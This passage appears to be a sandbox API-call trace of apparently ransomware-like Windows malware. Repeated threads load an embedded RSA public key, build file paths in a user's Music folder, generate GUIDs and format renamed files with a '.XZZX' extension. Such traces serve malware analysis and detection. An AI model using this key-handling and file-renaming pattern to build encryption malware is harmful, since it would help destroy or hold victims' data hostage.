param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\54E892FC383D1FA0EE2D03953C6A03E8.XZZX") returned 96 [0242.618] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0242.618] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\1EA9A0871CA5C223DC6F13B31F60A66B.XZZX") returned 96 [0242.618] StrStrW (lpFirst="54E892FC383D1FA0EE2D03953C6A03E8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 964 os_tid = 0x1218 [0242.773] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.773] lstrcpyW (in: lpString1=0x2baf460, lpString2="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" | out: lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" [0242.773] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.773] SetErrorMode (uMode=0x1) returned 0x1 [0242.773] lstrcpyW (in: lpString1=0x2baf860, lpString2="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" | out: lpString1="6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned="6D35692C49D86B1ADE80FADA4DF04F62.XZZX" [0242.773] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x24f77583, Data2=0x9e5f, Data3=0x4fe0, Data4=([0]=0x89, [1]=0x4e, [2]=0xa3, [3]=0xad, [4]=0xbc, [5]=0xe0, [6]=0x8c, [7]=0x96))) returned 0x0 [0242.774] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6D35692C49D86B1ADE80FADA4DF04F62.XZZX") returned 96 [0242.774] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0242.774] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\725B759D3169E42024F775833424C868.XZZX") returned 96 [0242.774] StrStrW (lpFirst="6D35692C49D86B1ADE80FADA4DF04F62.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 965 os_tid = 0x121c [0242.932] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0242.932] lstrcpyW (in: lpString1=0x2baf460, lpString2="A191878831212978B3B60CE1354E0DC0.XZZX" | out: lpString1="A191878831212978B3B60CE1354E0DC0.XZZX") returned="A191878831212978B3B60CE1354E0DC0.XZZX" [0242.932] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0242.932] SetErrorMode (uMode=0x1) returned 0x1 [0242.932] lstrcpyW (in: lpString1=0x2baf860, lpString2="A191878831212978B3B60CE1354E0DC0.XZZX" | out: lpString1="A191878831212978B3B60CE1354E0DC0.XZZX") returned="A191878831212978B3B60CE1354E0DC0.XZZX" [0242.932] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x32b2f934, Data2=0x32f1, Data3=0x46e5, Data4=([0]=0x8e, [1]=0xee, [2]=0xfb, [3]=0x44, [4]=0xad, [5]=0x6e, [6]=0x19, [7]=0x85))) returned 0x0 [0242.932] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\A191878831212978B3B60CE1354E0DC0.XZZX") returned 96 [0242.932] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0242.932] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\AF28C1F40E1B779532B2F93410D65BDD.XZZX") returned 96 [0242.932] StrStrW (lpFirst="A191878831212978B3B60CE1354E0DC0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 966 os_tid = 0x1220 [0243.085] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.085] lstrcpyW (in: lpString1=0x2baf460, lpString2="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" | out: lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" [0243.085] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0243.085] SetErrorMode (uMode=0x1) returned 0x1 [0243.086] lstrcpyW (in: lpString1=0x2baf860, lpString2="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" | out: lpString1="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX" [0243.086] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x868eb9e8, Data2=0xc25d, Data3=0x4883, Data4=([0]=0x88, [1]=0xb8, [2]=0xaf, [3]=0x2a, [4]=0x19, [5]=0x1e, [6]=0x7d, [7]=0xb0))) returned 0x0 [0243.086] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\B5A4F8D81D2BC280A6FB77022143A6C8.XZZX") returned 96 [0243.086] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0243.086] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\0ABB5948370D9D97868EB9E839C881DF.XZZX") returned 96 [0243.086] StrStrW (lpFirst="B5A4F8D81D2BC280A6FB77022143A6C8.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 967 os_tid = 0x1224 [0243.241] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.241] lstrcpyW (in: lpString1=0x2baf460, lpString2="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" | out: lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" [0243.241] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0243.241] SetErrorMode (uMode=0x1) returned 0x1 [0243.241] lstrcpyW (in: lpString1=0x2baf860, lpString2="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" | out: lpString1="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX" [0243.241] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x9ff71484, Data2=0x6de, Data3=0x4cdd, Data4=([0]=0x85, [1]=0x30, [2]=0xd6, [3]=0x73, [4]=0x74, [5]=0x94, [6]=0x92, [7]=0x4f))) returned 0x0 [0243.241] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\C8E8BDDC263509ECACA7C0D62A50EE34.XZZX") returned 96 [0243.241] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0243.242] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\82BEE278020FD5A69FF7148404CAB9EE.XZZX") returned 96 [0243.242] StrStrW (lpFirst="C8E8BDDC263509ECACA7C0D62A50EE34.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 968 os_tid = 0x1228 [0243.397] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.397] lstrcpyW (in: lpString1=0x2baf460, lpString2="E003588E3DA0B59DC1493EC641B899E5.XZZX" | out: lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX") returned="E003588E3DA0B59DC1493EC641B899E5.XZZX" [0243.398] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0243.398] SetErrorMode (uMode=0x1) returned 0x1 [0243.398] lstrcpyW (in: lpString1=0x2baf860, lpString2="E003588E3DA0B59DC1493EC641B899E5.XZZX" | out: lpString1="E003588E3DA0B59DC1493EC641B899E5.XZZX") returned="E003588E3DA0B59DC1493EC641B899E5.XZZX" [0243.398] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xd249f188, Data2=0x89ec, Data3=0x4e02, Data4=([0]=0xa5, [1]=0x67, [2]=0x38, [3]=0x54, [4]=0x3f, [5]=0x44, [6]=0xa9, [7]=0x57))) returned 0x0 [0243.398] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\E003588E3DA0B59DC1493EC641B899E5.XZZX") returned 96 [0243.398] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0243.398] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\6E6C71602A06FBD8D249F1882CC1E020.XZZX") returned 96 [0243.398] StrStrW (lpFirst="E003588E3DA0B59DC1493EC641B899E5.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 969 os_tid = 0x122c [0243.553] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.553] lstrcpyW (in: lpString1=0x2baf460, lpString2="EED603F80D860CC870D6498A119DF110.XZZX" | out: lpString1="EED603F80D860CC870D6498A119DF110.XZZX") returned="EED603F80D860CC870D6498A119DF110.XZZX" [0243.553] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\" [0243.553] SetErrorMode (uMode=0x1) returned 0x1 [0243.553] lstrcpyW (in: lpString1=0x2baf860, lpString2="EED603F80D860CC870D6498A119DF110.XZZX" | out: lpString1="EED603F80D860CC870D6498A119DF110.XZZX") returned="EED603F80D860CC870D6498A119DF110.XZZX" [0243.553] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0xc4c21393, Data2=0xd288, Data3=0x45b6, Data4=([0]=0xb3, [1]=0xa8, [2]=0x3c, [3]=0x83, [4]=0xd5, [5]=0x68, [6]=0x89, [7]=0x3c))) returned 0x0 [0243.553] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\EED603F80D860CC870D6498A119DF110.XZZX") returned 96 [0243.554] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0243.554] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\BB28FC18395454B0C4C213933C0F38F8.XZZX") returned 96 [0243.554] StrStrW (lpFirst="EED603F80D860CC870D6498A119DF110.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 970 os_tid = 0x1230 [0243.712] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.712] lstrcpyW (in: lpString1=0x2baf460, lpString2="06C3ECFB13862898AA23710517BB0CE0.XZZX" | out: lpString1="06C3ECFB13862898AA23710517BB0CE0.XZZX") returned="06C3ECFB13862898AA23710517BB0CE0.XZZX" [0243.712] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0243.712] SetErrorMode (uMode=0x1) returned 0x1 [0243.712] lstrcpyW (in: lpString1=0x2baf860, lpString2="06C3ECFB13862898AA23710517BB0CE0.XZZX" | out: lpString1="06C3ECFB13862898AA23710517BB0CE0.XZZX") returned="06C3ECFB13862898AA23710517BB0CE0.XZZX" [0243.712] CoCreateGuid (in: pguid=0x2bae440 | out: pguid=0x2bae440*(Data1=0x6bc1501f, Data2=0xe0f3, Data3=0x414e, Data4=([0]=0x9e, [1]=0x31, [2]=0xa2, [3]=0x4f, [4]=0x4a, [5]=0x88, [6]=0xdb, [7]=0x3f))) returned 0x0 [0243.712] wsprintfW (in: param_1=0x2baec60, param_2="%s%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\06C3ECFB13862898AA23710517BB0CE0.XZZX") returned 110 [0243.712] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x55828000, cbMultiByte=-1, lpWideCharStr=0x2bafee8, cchWideChar=64 | out: lpWideCharStr="XZZX") returned 5 [0243.712] wsprintfW (in: param_1=0x2bae450, param_2="%s%08X%08X%08X%08X.%s" | out: param_1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\6E9A2D6D39623D0A6BC1501F3C1D2152.XZZX") returned 110 [0243.712] StrStrW (lpFirst="06C3ECFB13862898AA23710517BB0CE0.XZZX", lpSrch="XZZX") returned="XZZX" Thread: id = 971 os_tid = 0x1234 [0243.865] lstrcpyA (in: lpString1=0x2bafc70, lpString2="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" | out: lpString1="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----") returned="-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQCWeBww97UHcRLjztOKvXB0xzRC LcZGov/Y/6x/m8uo42nLkyPgUjrqR7EAzB6bbB6L6aOgCJb2WyffOaNN5df07gIV f1Ea8u/jMIr5uhR+pnFMNB0jQIqqU9/slURM+U7dFvELbli5HL+7Ac/EehJNjLNW bpB5dTPCSSpKFoeoxQIDAQAB -----END PUBLIC KEY-----" [0243.865] lstrcpyW (in: lpString1=0x2baf460, lpString2="38DC595E3788A5BA7503B1493BA98A02.XZZX" | out: lpString1="38DC595E3788A5BA7503B1493BA98A02.XZZX") returned="38DC595E3788A5BA7503B1493BA98A02.XZZX" [0243.865] lstrcpyW (in: lpString1=0x2bae860, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\auOsV3M 9VtNbJuKze\\9Y_m-oVB2IyYX\\" [0243.865] SetErrorMode (uMode=0x1) returned 0x1 [0243.865] lstrcpyW (in: lpString1=0x2baf860, lpString2="38DC595E3788A5BA7503B1493BA98A02.XZZX" | out: 